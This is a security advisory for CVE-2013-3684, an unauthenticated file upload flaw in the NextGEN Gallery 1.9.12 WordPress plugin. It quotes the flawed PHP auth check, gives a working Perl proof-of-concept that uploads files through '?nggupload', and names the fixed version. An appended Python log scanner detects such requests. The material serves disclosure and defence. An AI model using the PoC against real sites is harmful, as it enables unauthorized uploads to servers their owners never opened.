##############################################################
- S21Sec Advisory -
##############################################################

Title:      NextGEN Gallery 1.9.12 Arbitrary File Upload
ID:         S21SEC-046-en
CVE ID:     CVE-2013-3684
Severity:   High
Status:     Fixed
History:    27.May.2013 Vulnerability discovered
            28.May.2013 Vendor informed
            12.Jun.2013 Fix released
Authors:    Marcos Agüero ([email protected])
URL:        http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt
Release:    Public

[ SUMMARY ]

NextGEN Gallery is a WordPress gallery plugin that offers sophisticated gallery management and display. It is one of the most popular plugins ever produced for WordPress, currently downloaded around 30,000 times per week.

[ AFFECTED VERSIONS ]

* NextGEN Gallery 1.9.12

[ DESCRIPTION ]

NextGEN Gallery allows unauthenticated users to upload files. The filters in place only permit uploads of image files (extensions .gif, .png and .jpg). This prevents script execution on the server, but an attacker can still use the affected system to host arbitrary content under an image extension: the PoC below sends any local file as file.gif with an image/gif Content-Type.

The vulnerability is due to an inappropriate auth-cookie validation in the admin/upload.php script. Every permission check is nested inside the if (wp_validate_auth_cookie()) branch, so a request that carries no valid auth cookie at all skips the checks entirely and reaches the upload code:

    if (wp_validate_auth_cookie()) {
        $results = wp_parse_auth_cookie();
        $logged_in = FALSE;
        if (isset($results['username']) && isset($results['expiration'])) {
            if (time() < floatval($results['expiration'])) {
                if (($userdata = get_userdatabylogin($results['username'])))
                    $logged_in = $userdata->ID;
            }
        }
        if (!$logged_in)
            die("Login failure. -1");
        else if (!user_can($logged_in, 'NextGEN Upload images')) {
            die('You do not have permission to upload files. -2');
        }
    } # VULN: No auth cookie is okay!

This can be triggered by passing the 'nggupload' parameter on any valid WordPress URL, because the plugin registers the handler on the 'init' action, which runs for every request:

ngggallery.php:

    // Handle upload requests
    add_action('init', array(&$this, 'handle_upload_request'));
    [...]
    function handle_upload_request() {
        if (isset($_GET['nggupload'])) {
            require_once(implode(DIRECTORY_SEPARATOR, array(
                NGGALLERY_ABSPATH, 'admin', 'upload.php'
            )));
            throw new E_Clean_Exit();
        }
    }

[ POC ]

    #!/usr/bin/perl
    # Usage: poc.pl <wordpress-url-with-?nggupload> <local-file>
    # Sends any local file as file.gif through the unauthenticated upload handler.
    use strict;
    use warnings;
    use LWP;
    use HTTP::Request::Common;

    my ($url, $file) = @ARGV;
    die "usage: $0 <url> <file>\n" unless defined $url and defined $file;

    # The 'name' field was left undefined in the original PoC; the upload
    # filename is used here so the request is well-formed.
    my $name = 'file.gif';

    my $ua  = LWP::UserAgent->new();
    my $req = POST $url,
        Content_Type => 'form-data',
        Content      => [
            name          => $name,
            galleryselect => 1,                # Gallery ID, should exist
            Filedata      => [ $file, $name, Content_Type => 'image/gif' ],
        ];

    my $res = $ua->request($req);
    if ($res->is_success) {
        print $res->content;
    } else {
        print $res->status_line, "\n";
    }

[ SOLUTION ]

Upgrade to version 1.9.13, released by the vendor:
http://wordpress.org/plugins/nextgen-gallery/

[ REFERENCES ]

* S21Sec http://www.s21sec.com

--
Marcos Agüero
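A detection check to go with the advisory above. This is an added example, not part of S21Sec's text or of the NextGEN Gallery code: it scans web-server access-log lines in the common "combined" format for requests that carry the 'nggupload' query parameter, which the advisory identifies as the trigger that routes any request into admin/upload.php. The log lines are constructed for the example, and the IP addresses and user agents in them are made up. Because the plugin's own handler sits on the 'init' action, legitimate uploads from an authenticated administrator also pass through it, so a hit is a lead to correlate with login activity, not proof of exploitation.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Prefix of the Apache/nginx "combined" access-log format; referer and
# user agent follow and are not needed for this check.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def is_nggupload_hit(line):
    """Return request details if the line invokes the nggupload handler, else None.

    PHP's isset($_GET['nggupload']) is satisfied by a bare "?nggupload" with no
    value, so blank values must be kept when parsing the query string.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query, keep_blank_values=True)
    if "nggupload" not in query:
        return None
    method = m.group("method")
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "method": method,
        "path": parts.path,
        "status": int(m.group("status")),
        # The advisory's PoC is a multipart POST; a GET still reaches
        # upload.php and is reported, but flagged as not an upload attempt.
        "upload_attempt": method == "POST",
    }


def scan(lines):
    """Return the details of every nggupload request found in the given lines."""
    return [hit for hit in map(is_nggupload_hit, lines) if hit]


# Constructed sample log lines (not real traffic). The user agent
# "libwww-perl/6.05" is what the Perl LWP module sends by default.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/May/2013:14:02:11 +0200] "POST /?nggupload HTTP/1.1" '
    '200 512 "-" "libwww-perl/6.05"',
    '198.51.100.7 - - [27/May/2013:14:03:40 +0200] "GET /2013/05/hello-world/ HTTP/1.1" '
    '200 8123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/May/2013:14:05:02 +0200] "POST /blog/index.php?nggupload=1 HTTP/1.1" '
    '200 420 "-" "libwww-perl/6.05"',
    '192.0.2.9 - - [27/May/2013:14:06:13 +0200] "GET /wp-login.php?nggupload HTTP/1.1" '
    '302 0 "-" "curl/7.30.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        flag = "UPLOAD" if hit["upload_attempt"] else "probe"
        print(f'{hit["timestamp"]} {hit["ip"]:<15} {flag:<6} {hit["method"]} {hit["path"]} -> {hit["status"]}')
```

Run it against a real access log with scan(open(path)) and review the POST hits from clients that never appear in wp-login.php activity; after the upgrade to 1.9.13 the same lines are still worth keeping as a baseline for what legitimate admin uploads look like.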
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/